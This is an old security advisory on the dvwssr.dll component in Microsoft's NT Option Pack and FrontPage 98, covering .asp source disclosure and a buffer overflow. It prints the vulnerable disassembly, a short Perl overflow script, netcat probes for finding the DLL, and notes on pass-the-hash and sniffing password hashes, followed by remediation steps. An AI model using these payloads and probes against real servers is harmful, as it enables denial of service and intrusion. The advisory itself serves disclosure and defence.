COMMAND
"Link View Server-Side Component"
SYSTEMS AFFECTED
See below
PROBLEM
Following is based on a Security Bulletin from the Microsoft.
It's very similar to (or perhaps the same):
http://oliver.efri.hr/~crv/security/bugs/NT/fpse8.html
Dvwssr.dll is a server-side component used to support the Link
View feature in Visual Interdev 1.0. By design, it provides .asp
files to clients who have web authoring privileges on the server.
However, it does not properly restrict the files that a web author
can request, with the result that a user who has web authoring
privileges on one web site could request .asp files from anywhere
on the server, including other web sites hosted on it. However,
even with this vulnerability, the component would only comply with
the request if the specific file granted read access to the user.
There are some significant restrictions to this vulnerability:
- Only servers hosting multiple web sites could be affected by
it
- Only a user who has web authoring privileges for a site on
the server could request a file. He would need to know the
name and location of the file on the server.
- The files would only be sent if their permissions granted
read access to the particular user who requested them. In
most cases, this would mean that the files granted read
access to the Everyone group
- Only .asp files (and global.asa, which is a special-case
.asp file) could be retrieved.
The affected component is part of Visual Interdev 1.0. However,
it is a server-side component, and is included in the following
products:
- Windows NT 4.0 Option Pack
- Personal Web Server 4.0, which ships as part of Windows 95 and 98
- Front Page 98 Server Extensions
Core-SDI has been playing with dvwssr.dll and we've found a buffer
overflow that stops the server from incoming connections, at
least. The code where the buffer overflow resides is:
mov eax, [edi+TEXTENSION_CONTROL_BLOCK.lpszQueryString]
test eax, eax
jz _text_581813FD
push eax
lea eax, [esp+14h+queryStringCoph]
push eax
call ds:lstrcpyA ;see here MS ENGINEERS: BUFFER OVERFLOW
test eax, eax
jz _text_581813FD
lea eax, [esp+10h+queryStringCoph]
push eax
call unescape_url
So, below is an example of how to exploit this vulnerability.
Of course, having the source code makes it harder to find this
types of bugs...
#!/usr/bin/perl
print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1\nHost: yourhost\n\n";
Core-SDI has been playing a little more trying to exploit this
buffer overflow, and as they don't have InterDevs installed on
their IIS, they copied the .dll to /msadc directory, and with
this configuration, they have been able to make the code jump to
their buffer. Under this circunstances, the actual BO allow to
execute arbitrary code in the target machine. It's interesting
to note that no log is generated as efect of this attack.
BindView RAZOR Team made analysis of DVWSSR.DLL risks. The risks
of having dvwssr.dll are not as severe as originally reported in
media outlets Friday morning, but still severe enough that system
administrators responsible for NT systems to investigate. The
risks involve whether or not a certain DLL is loaded, how rights
are set, and potentially how Front Page 98 is used.
1. If you have Microsoft NT 4 with the Option Pack loaded and
FrontPage 98, you have the vulnerable dvwssr.dll loaded.
2. To run the dll remotely you need to have read access to the
dll. This is not assigned by default. Typically on systems
with multiple virtual hosts the administrator could have stuck
everyone with a virtual host on the system into a group and
given that group access to the dll. This would imply that any
virtual host maintainer could look at other hosts' files.
Obviously a misconfigured host might allow anonymous access,
but this would require purposeful actions by the administrator
for this to exist.
3. The files in question are asp files. This dll gives you the
ability to read asp source, so it is possible that hardcoded
user names and passwords to backend systems may be viewed.
This is essentially the risk that Rain Forest Puppy found and
it is explained at link mentioned above at start od this
advisory.
4. There exists a buffer overflow in the dvwssr.dll. At offset
0x581811C9 in the DLL is an unchecked lstrcpy. By sending a
large string of characters, the dvwssr.dll can be overflowed.
By carefully constructing these characters, it is possible to
remotely execute commands as "system" which can be used for
elevating priviledges. The buffer overflow was uncovered by
CoreSDI.
5. In theory if you can get the hash of a user with the access,
you can exploit the buffer overflow. This is called "passing
the hash", and essentially means that you use the hash without
cracking the password to authenticate to the target server.
See
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind9704&L=NTBUGTRAQ&P=R2734&D=0
for details from RAZOR's Paul Ashton on the basis for this
technique. This technique is currently one of the stars of
Foundstone's "Hacking Exposed: Live" presentations being put on
by George Kurtz and Eric Schultze at security shows around the
globe. Certainly in theory this could be adapted to this
exploit.
6. Sniffing the NT LanMan password hash being sent by a legitimate
FP98 user using L0phtcrack, and subsequently cracking the
password would certainly give you the proper access to run the
dll, and therefore elevate priviledges. This would of course
mean that the sniffer would have to be located between the
legit user and the target server, but is not beyond the realm
of possibility.
Detection of the DLL is quite simple. The following examples use
NetCat
Example 1:
==========
$ nc -v -w2 target.system 80
GET /_vti_bin/_vti_aut/dvwssr.dll HTTP/1.0 (hit enter twice)
HTTP/1.0 500 Server Error (The system could not find the environment
option that was entered. )
The 500 error means dvwssr.dll is not present.
Example 2:
==========
$ nc -v -w2 target.system 80
GET /_vti_bin/_vti_aut/dvwssr.dll HTTP/1.0 (hit enter twice)
HTTP/1.0 401 Access Denied
The 401 error means dvwssr.dll is present but you do not have the
rights to it.
Example 3:
==========
$ nc -v -w2 target.system 80
GET /_vti_bin/_vti_aut/dvwssr.dll HTTP/1.0 (hit enter twice)
Connection closed by foreign host.
The connection closed means that you had the rights to run the
DLL, but since no parameters were passed the connection was
completed.
Users of BindView's HackerShield can use the Rapid Fire Update
released on the evening of April 14 to detect the presense of the
DLL on their systems they manage.
SOLUTION
To eliminate this vulnerability, customers who are hosting web
sites should delete all copies of the file Dvwssr.dll from their
servers. The FAQ provides step-by-step instructions for doing
this. The only functionality lost by deleting the file is the
ability to generate link views using Visual Interdev 1.0.
Windows 2000 is not affected by this vulnerability. Upgrading
from an affected Windows NT 4.0 to Windows 2000 removes the
vulnerability. Installing Office 2000 Server Extensions on an
affected server removes this vulnerability. Installing FrontPage
2000 Server Extensions on an affected server removes this
vulnerability.